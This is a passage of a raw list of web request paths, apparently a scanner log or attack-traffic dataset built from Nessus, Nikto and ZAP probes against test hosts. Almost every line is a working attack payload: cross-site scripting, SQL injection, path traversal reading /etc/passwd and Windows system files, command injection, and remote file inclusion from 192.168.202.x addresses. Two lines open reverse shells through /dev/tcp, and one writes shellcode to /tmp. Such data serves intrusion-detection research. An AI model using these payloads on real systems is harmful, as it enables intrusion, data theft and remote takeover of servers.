3/\n/javascript/umts.exe\n//........................................................................../../../../../../../../windows/win.ini\n/rpxyx07v.html?<script>document.cookie=\"testbnli=1975;\"</script>\n/en-us/h5sc3gxy.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/login.php?course=\"><script>alert(atutor_xss.nasl)</script>\n/vwmg565s.htm?<script>cross_site_scripting.nasl</script>\n/o35zot2r.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/\"mary cheney\"/\n/javascript/.passwd.error\n/recordings/texis.exe/?-dump\n/jw64yq8u.cfc?<script>document.cookie=\"testylfu=1313;\"</script>\n/examples/jsp/jsp2/el/workarea/contentdesigner/ekformsiframe.aspx?id=\"><script>alert('nessus')</script>\n/en-us/account/shopexd.asp?catalogid='42\n/x2gyorli.fts?<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/_vti_bin/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?logout='&rm\\x09q79227952\\x09#\n/fc9t54l7.kspx?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/javascript/publication.exe\n/mv8wxfy9.dll?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/byrg33fw.idc?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/javascript/dropped.exe\n/clk;58165316;7163019;j/\n/<script>cross_site_scripting.nasl</script>.x\n/en-us/h5sc3gxy.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0w155a7c.htm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1737115412\n/j4rdyhw8.x?<script>document.cookie=\"testrluj=1420;\"</script>\n/yver8r9o.htm?<script>cross_site_scripting.nasl</script>\n/index.php?download=/etc/passwd\n/msadc/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/p.exe\n/j734qobz.x?<script>cross_site_scripting.nasl</script>\n/fc9t54l7.dll?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/javascript/pfx.exe\n/main.php?stuff='\\x0duname\\x09>q27918964\\x09#\n/subscriptions2/\n/scripts/1332010197-ror_session_fixation.nasl\n/0w155a7c.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/page.exe\n/top.php?stuff=\"\\x0adel q36232773 #\n/scripts/mj_wwwusr\n/examples/jsp/colors/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/zuihld5m.php3?<script>cross_site_scripting.nasl</script>\n/j4rdyhw8.do?<script>document.cookie=\"testrluj=1420;\"</script>\n/_mem_bin/..\\xc0/..\\xc0/..\\xc0/..\\xc0/..\\xc0/../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/manager/showproduct.php?product=1'\n/7uz3ok60.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b4vng02k.html?<script>document.cookie=\"testtrlh=3672;\"</script>\n/static//.../.../.../.../.../.../.../.../etc/passwd\n/examples/servlets/servlet/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/examples/jsp/jsp2/el/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/cgi-bin/survey.inc.php?path=/etc/passwd\\x00\n/examples/jsp/checkbox/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/twiki/bin/view/main/twikiusers?rev=3739 `0<&40-;exec 40<>/dev/tcp/192.168.202.118/9893;sh <&40 >&40 2>&40`#\n/cgi-915/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/cgi-bin/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/cgi-bin/technote/main.cgi?board=free_board&command=down_load&filenikto=/../../../../../../../../../../etc/passwd\n/ybz5rz7a.fts?<script>document.cookie=\"testsbvw=6289;\"</script>\n/scripts/test-cgi\n/javascript/information.exe\n/javascript/j2me.exe\n/main.php?stuff='&sleep 10 #\n/examples/jsp/jsp2/jspx/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st='\n/yacs/scripts/update_trailer.php?context[path_to_root]=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/main.php?stuff=\"del q49686563 #\n/manager/doc/index.php?s=/etc/passwd\\x00\n/scripts/forum.php3?id_article=1&id_forum=-1/**/union/**/select 2080375299--\n/cgi-bin/js/scripts.php?load=/etc/passwd\\x00\n/cgi-perl/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n<script>document.cookie=\"testiklc=904;\"</script>\n/javascript/msie.exe\n/en-us/s7qus4g3.nsf?<script>cross_site_scripting.nasl</script>\n/quagynka.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gy23xnjq.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/cgi-bin/index.php?id=s1_eihg6e1'\n/3m5knyc4.htm?<script>document.cookie=\"testbgqj=6434;\"</script>\n/javascript/torrent.exe\n/examples/jsp/jsp2/el/js/vendors.php?file=../../../../../../../../../../etc/passwd\\x00nessus.js\n/m2fpztty.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ping -w 7000 -n 1 1.2.3.4&rem \n/main.php?logout=\"&rm\\x0cq71167917&rem\\x0c\n/cgi-915/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/options.exe\n/examples/jsp/cal/ftp/ftp.pl?dir=../../../../../../etc\n/search/show.pl?url=file:/etc/passwd\n/top.php?stuff=\"ver,>q89398857&rem,\n/b1q8bywu.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ybz5rz7a.jsp?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/help.php?q=\";uname #\n/scripts/athenareg.php?pass= ;id\n/scriptpath/index.php?page=http://192.168.202.96:8080/ipb5ri?\n/examples/jsp/jsp2/jspx/a1disp3.cgi?/../../../../../../etc/passwd\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ybuoueddeq.sh+>+/dev/null+&'); function v\n/main.php?logout=\"&ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n//../../../../../../../../windows/win.ini\\x00\n/javascript/htpasswd.cnf\n/fcgi-bin/ion-p?page=../../../../../etc/passwd\n/recordings/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/phpmyadmin/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/examples/jsp/colors/viewpage.php?file=/etc/passwd\n/cgi-bin/minis.php?month=../../../../../../etc/passwd\n/webmathematica/msp?mspstoreid=../../../../../../../../../../etc/passwd&mspstoretype=image/gif\n/help.php?q=\"\\x0duname\\x09>q99489698\\x09#\n/scripts/vhost.php?action=logout&time=1331904150\n/main.php?stuff=\"&uname #\n/main.php?stuff=\"&uname\\x09>q61351616\\x09#\n/subscriptions.manifest\n/examples/jsp/sessions/include/theme.inc.php?fullpath=/etc/passwd\\x00\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/cf5_upload.cfm?command=fileupload&type=file&currentfolder=/\n/_scripts/\n/index.php?op=default&date=200607' union select 1,379183911,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/rih28haesl0j.shtml\n/examples/jsp/jsp2/jspxmultihtml.pl?multi=/etc/passwd\\x00html\n/help.php?q=\"&del\\x09q13287114\\x09#\n/ddoworrl.jsp?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/hrttz9fj.dll?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/cgi-bin/webplus?script=../../../../../../../../../../etc/passwd\n/examples/jsp/num/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/cgi-915/ion-p.exe?page=c:\\winnt\\repair\\sam\n/ap58k3ci.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/lenya.exe\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/phpmyadmin/documentation.html?phpmyadmin='\"'\");|]*{%0d%0a<%00>\n/redcell/phonehome_script.exe\n/en-us/account/embed/day.php?path=/etc/passwd\\x00\nftp://192.168.22.202/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/scripts/t769qwej0llr.inc\n/javascript/sync.exe\n/examples/servlets/servlet/docs.php?doc=../jpgraph-1.12.1/docs/index\n/javascript/aa.exe\n/subscriptions.gz\n/qb2xy9aw.kspx?<script>cross_site_scripting.nasl</script>\n/5o9zq43e.pl?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=';del q64815511 #\n/main.php?stuff='\\x0drm q97623189 #\n/examples/jsp/checkbox/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/miz4r5hz.html?<script>document.cookie=\"testviqu=1270;\"</script>\n/scs86g1p.exe?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/cgi-exe/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/ezprescription/\n/top.php?stuff='\\x0ddel\\x09q88128927\\x09#\n/nuh3zirz.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/qb2xy9aw.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/cal/calendar.php?month=' union select 1,1,'1331904431','calendarix_month_sql_injection.nasl',1 #\n/cacti/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/top.php?stuff=\"&ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1&rem\\x09\n/scripts/php.cgi?/etc/passwd\n/jujgxwav.jsp?<script>document.cookie=\"testknim=9383;\"</script>\n/recordings/man-cgi?section=0&topic=ls;id\n/scripts/cgi-lib.pl\n/scripts/shared/help.php?page=../../../../../../../../../../etc/passwd\\x00\n/xfkun1ku.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/control.exe\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/recordings/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/i2n4v4rl.jspa?<script>cross_site_scripting.nasl</script>\n/gy23xnjq.jsp?<script>cross_site_scripting.nasl</script>\n/8x6w469u.pl?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/javascript/jsf.exe\n/examples/jsp/error/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/en-us/hipkz026.do?<script>document.cookie=\"testyrbs=2855;\"</script>\n/demo/ms-pe02/catalog.php?cid=0&sid='\"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/iroy1gvqrrqu?&\n/spg-xss/\n/scripteditor/\n/p043snfr.cfm?<script>cross_site_scripting.nasl</script>\n/en-us/account/wordtrans.php?command=show_desc&advanced=1\";id; true \"\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/no4ghqiguzhst??\n/cgi-local/ion-p?page=../../../../../etc/passwd\n/edzaia0i.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/smpwservicescgi.exe\n/subscriptions.vbs\n/q703m78q.jspa?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/vhzmaia2.kspx?<script>document.cookie=\"testkogj=3979;\"</script>\n/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/en-us/w4996nr0.cgi?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/javascript/panel.exe\n/cgi-914/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/ywaxntrx.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||\n/javascript/document.tpl\n/cgi.cgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/phpmyadmin/documentation.html?phpmyadmin=1\"\n/javascript/42.exe\n/wasdscripts172-vax/\n/y8pmygrp.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/wiki.php/<script>foo</script>\n/scripts/gdxlwjnlsr6i.cfm\n/cgi-bin/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/help.php?q=\"&ver&rem,\n/scripts/settings/site.ini\n/7o5qp766.php3?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;rm+/tmp/fbpansgiuv\"\n/ows-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/sponsor-shot'02/\n/help.php?q=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c1.2.3.4&rem\\x0c\n/hrttz9fj.kspx?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/javascript/dclk.exe\n/fo564rei.nsf?<script>cross_site_scripting.nasl</script>\n/3hlysl2x.mscgi?<script>document.cookie=\"testgjbe=8505;\"</script>\n/en-us/hipkz026.cgi?<script>document.cookie=\"testyrbs=2855;\"</script>\n/antispam/listdel?file=whitelist&name=a<script>alert('vulnerable')</script>&startline=0(naturally)\n/cgi-perl/htimage.exe/path/filename?2,2\n/y8pmygrp.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/examples/servlets/servlet/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz??cmd=id;pwd\n/examples/jsp/sessions/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/manager/embed/day.php?path=/etc/passwd\\x00\n/help.php?q=\"del;q43131815&rem;\n/main.php?stuff='\\x0arm\\x09q13973431\\x09#\n/terrmcd'/\n/eg2u8pbv.cfm?<script>cross_site_scripting.nasl</script>\n/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/t99iadgtkf9h.asp\n/layoutscripts/\n/hipkz026.php?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/recordings/listrec.pl?app=qmh-news&template=;ls /etc|\n/scripts/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/cgi/gw5/gwweb.exe?htmlver=aaa&get-context\n/examples/jsp/checkbox/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/examples/jsp/colors/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/phpmyadmin/../phpmyadmin.sln\n/ewc3rz1l.asp?<script>document.cookie=\"testkgqo=204;\"</script>\n/examples/jsp/cal/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/forum1.asp?n=1753&amp;nn=c:\\boot.ini\n/fcgi-bin/cgi-test.exe\n/main.php?logout=ping;-w;9000;-n;1;4.3.2.1|rem;\n/mpcgi/texis.exe/junk\n/help.php?q=\"&ping;-w;8000;-n;1;4.3.2.1&rem;\n//../../../../../../../../windows/win.ini\\x00en\n/s7qus4g3.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-win/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/scripts/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/examples/jsp/checkbox/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\\x00\n/scripts/qg9h0c0svvat.pl\n/uc3w3bdi.exe?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x\n/8t9v8k7x.htm?<script>document.cookie=\"testhvje=9403;\"</script>\n/p043snfr.do?<script>cross_site_scripting.nasl</script>\n/index.php?op=default&date=200607' union select 1,779875714,1,1,1,1,1,1,1,1--&blogid=1\n/en-us/account/docs.php?doc=../jpgraph-1.12.1/docs/index\n/examples/jsp/colors/index.php?string='\n/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/t3af3tdz.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"del\\x09q57557316&rem\\x09\n/cgi-local/testcgi.exe\n/manager/html;jsessionid=8c46789d19abadf0888a3b406a3d1441?org.apache.catalina.filters.csrf_nonce=ba2f57ae4d6ec3af51ddecd681e24205\n/9ko6m4c8.fts?<script>document.cookie=\"testylik=3403;\"</script>\n/javascript/decode.exe\n/odzk29aa.nsf?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/t578vqea.x?<script>document.cookie=\"testsory=7676;\"</script>\n/dirdiff_script/\n/en-us/n9xlumt5.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/ac.php?bannerid=-1331908693+or+1=1+--+';passthru(base64_decode($_server[http_nessus_f6pybogs]));die;/*\n/javascript/options.exe\n/x2gyorli.exe?<script>document.cookie=\"testwhac=3130;\"</script>\n/azcrfs8d.asp?<script>document.cookie=\"testjpdr=9205;\"</script>\n/webcalendar/week.php?user=\\\"><script>alert(document.cookie)</script>\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.jsp\n/javascript/tip.exe\n/6wb70v0b.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=';uname >q26271527 #\n/examples/jsp/colors/check_user_id.php?user_id=<script>foo</script>\n/examples/jsp/jsp2/el/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/scripts/webif.cgi\n/o6ebbirj.do?<script>cross_site_scripting.nasl</script>\n/cleartrust/ct_logon.jsp?ctloginerrormsg=<script>alert(1)</script>\n/somepagewithxss/\n/top.php?stuff=\"&del q94671165 #\n/help.php?q=\"ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/ydexw8by.exe?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/en-us/n9xlumt5.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jw64yq8u.fts?<meta http-equiv=set-cookie content=\"testylfu=1313\">\n/recordings/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/scripts/perl?-v\n/top.php?stuff=\"&ping;-w;8000;-n;1;4.3.2.1&rem;\n/phpmyadmin/index.php?configfile=../../../../../../../../../etc/passwd\n/error/\\..\\..\\..\\..\\windows\\win.ini\n/examples/jsp/checkbox/index.php?entry='\n/javascript/sink.exe\n/vhzmaia2.php3?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/tzhfyzkbomspvm??\n/examples/jsp/colors/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/javascript/show_thread.exe\n/shopscript/\n/tuwjta1w.dll?<script>document.cookie=\"testpokn=7494;\"</script>\n/esmozg5d.do?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../../../etc/passwd\n/rv98iwjp.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/u7m5ok8eqpfy.php3\n/en-us/i686v90l.jsp?<script>document.cookie=\"testfutf=1550;\"</script>\n/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../\n/ows-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/um7xpn15.mscgi?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/226_asp tutorials - microsoft scripting runtime dll/\n/vac1l5vm.aspx?<script>cross_site_scripting.nasl</script>\n/byrg33fw.x?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/filedetails.php?path=</title><script>alert(414086083540)</script>\n/script//ident/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/lmw4r201.exe?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/cgis/sensepost.exe?/c+dir\n/en-us/account/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/scs86g1p.asp?<script>document.cookie=\"testquyx=2820;\"</script>\n/javascript/ccbill.exe\n/javascript/_pages.exe\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/iroy1gvqrrqu?'\n/examples/jsp/error/cart32.exe\n/examples/jsp/num/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/help.php?q=\"del\\xa0q23773279&rem\\xa0\n/e9rx3ya4.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.dll?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/cgi-915/fileseek.cgi?foot=&head=;cat /etc/passwd|\n/phpmyadmin/documentation.html?phpmyadmin=`/etc/passwd`\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=q54818976&scr_height=&scr_width=\n/examples/jsp/checkbox/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"h\\0300\\0250\\0312fh\\0002\\0000\\0340\\0275\\0211\\0340j\\0020pr\" >> /tmp/xmefwyizyj0;echo|awstats230267.txt\n/cgi-bin/readfile.tcl?file=/etc/master.passwd\n/javascript/decoder.exe\n/m5103snj.x?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/main.php?logout=\"&ver >q75783223&rem \n/t578vqea.cgi?<script>document.cookie=\"testsory=7676;\"</script>\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/javascript/todo.exe\n/zuihld5m.fts?<script>cross_site_scripting.nasl</script>\n/l4fz1dqw.exe?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/webdist.cgi?distloc=;id\n/examples/jsp/sessions/includes/db_adodb.php?basedir=/etc/passwd\\x00\n/<script>document.cookie=\"testsqmm=5713;\"</script>\n/169okeyj.php3?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/scripts/ikonboard.cgi\n/scripts/al_initialize.php?alpath=/etc/passwd\\x00\n/&lt;script&gt;alert('vulnerable');&lt;/script&gt;\n/bn857frh.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/hipkz026.idc?<script>document.cookie=\"testyrbs=2855;\"</script>\n/help.php?q='\\x0drm\\x09q85664498\\x09#\n/bmeun223.htm?<script>document.cookie=\"testhhwu=7044;\"</script>\n/u95h6ymu.nsf?<script>document.cookie=\"testkhwc=4028;\"</script>\n/cgi-bin/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/n9xlumt5.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/help.php?q=\"&ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/crystalreportwebformviewer/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/cgi-home/texis.exe/junk\n/dinosaur'us/\n/examples/jsp/cal/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/phpmyadmin/rot13sj.cgi?/etc/passwd\n/odzk29aa.mscgi?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/9o6g5vkn.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping;-w;9000;-n;1;1.2.3.4|rem;\n/iajtej82.nsf?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/ydexw8by.cfc?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/manager/index.php?p='nessus\n/index.php?msgs=<script>alert(414436083577)</script>\n/fc9t54l7.do?<script>document.cookie=\"testggad=2000;\"</script>\n/help.php?q=ver >q45459255&rem \n/examples/jsp/colors/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd\n/comersus_searchitem.asp\"><script>alert('nessus was here');</script>\n/help.php?q=\";del q43236884 #\n/cgi-bin/index.php?op=default&date=200607' union select 1,744292830,1,1,1,1,1,1,1,1--&blogid=1\n/xfkun1ku.jspa?<script>cross_site_scripting.nasl</script>\nftp://192.168.21.103/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/j4oqyvga.html?<script>cross_site_scripting.nasl</script>\n/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/j2kdmfw4.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/rpxyx07v.x?<script>document.cookie=\"testbnli=1975;\"</script>\n/xsqln7eb.cfc?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/cgi-bin/index.php?configfile=../../../../../../../../../etc/passwd\n/ao22ww7y.kspx?<script>document.cookie=\"testqppc=8767;\"</script>\n/javascript/static.exe\n/yppasswd/\n/0w155a7c.jsp?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=&ver;>q36796118&rem;\n/?<script>document.cookie=\"testkhwc=4028;\"</script>\n/o35zot2r.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bmeun223.asp?<script>document.cookie=\"testhhwu=7044;\"</script>\n/ewc3rz1l.kspx?<script>document.cookie=\"testkgqo=204;\"</script>\n/javascript/output.exe\n/9o6g5vkn.dll?<script>cross_site_scripting.nasl</script>\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- \n/help.php?q='\\x0duname >q17837735 #\n/interface/login/login_frame.php?site=<script>alert(\"owasp zap\");</script>\n/help.php?q=rm;q21957336&rem;\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008322&lang_crm=../../vtigerservice.php\\x00\n/gall's_law/\n/ao22ww7y.jsp?<script>document.cookie=\"testqppc=8767;\"</script>\n<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/manager/phpnews/sendtofriend.php?mid='1'\n/raanw4ia.jspa?<script>cross_site_scripting.nasl</script>\n/i2n4v4rl.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/handler/blah;id|?data=download\n/examples/jsp/num/protection.php?action=logout&siteurl=/etc/passwd\n/scripts/calendar.php?month=' union select 1,1,'1332010410','calendarix_month_sql_injection.nasl',1 #\n/8t9v8k7x.mscgi?<script>document.cookie=\"testhvje=9403;\"</script>\n/v3axg1p8.jsp?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/fnwhrxyd.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0z575z74.php?<script>document.cookie=\"testuhsv=9753;\"</script>\n/examples/jsp/checkbox/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/h5sc3gxy.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scs86g1p.fts?<script>document.cookie=\"testquyx=2820;\"</script>\n/ddoworrl.cgi?<script>document.cookie=\"testvlau=8517;\"</script>\n/hipkz026.htm?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/b5xdqgz2.idc?<script>cross_site_scripting.nasl</script>\n/cgis/fileseek.cgi?foot=;cat /etc/passwd&head=\n/main.php?logout=';del q85646861 #\n/qb2xy9aw.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bzuf9ozq.php?<script>cross_site_scripting.nasl</script>\n/cgi-bin/fpremadm.exe\n/cgi-bin/newsdesk.cgi?t=../../../../../../../../../../etc/passwd\n/modules.php?op=modload&name=xforum&file=<script>alert('vulnerable')</script>&fid=2\n/twiki/bin/view/main/twikiusers?rev=0859 `0<&94-;exec 94<>/dev/tcp/192.168.202.118/12667;sh <&94 >&94 2>&94`#\n/drhcprxk.exe\n/ybz5rz7a.php3?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/examples/jsp/num/www/delivery/ac.php?bannerid=-1331904368+or+1=1+--+';passthru(base64_decode($_server[http_nessus_itstoxgj]));die;/*\n/<script>document.cookie=\"testkhwc=4028;\"</script>\n/javascript/event.exe\n/bzuf9ozq.asp?<script>cross_site_scripting.nasl</script>\n/i686v90l.do?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/h4bi26jd.asp?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/1r8cfrlf.nsf?<script>document.cookie=\"testydan=5106;\"</script>\n/i2n4v4rl.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"rm\\xa0q93611953&rem\\xa0\nftp://192.168.21.203/*<apache_mod_proxy_ftp_glob_xss.nasl>\n/typoscript-f35/\n/zroo33l4.jspa?<meta http-equiv=set-cookie 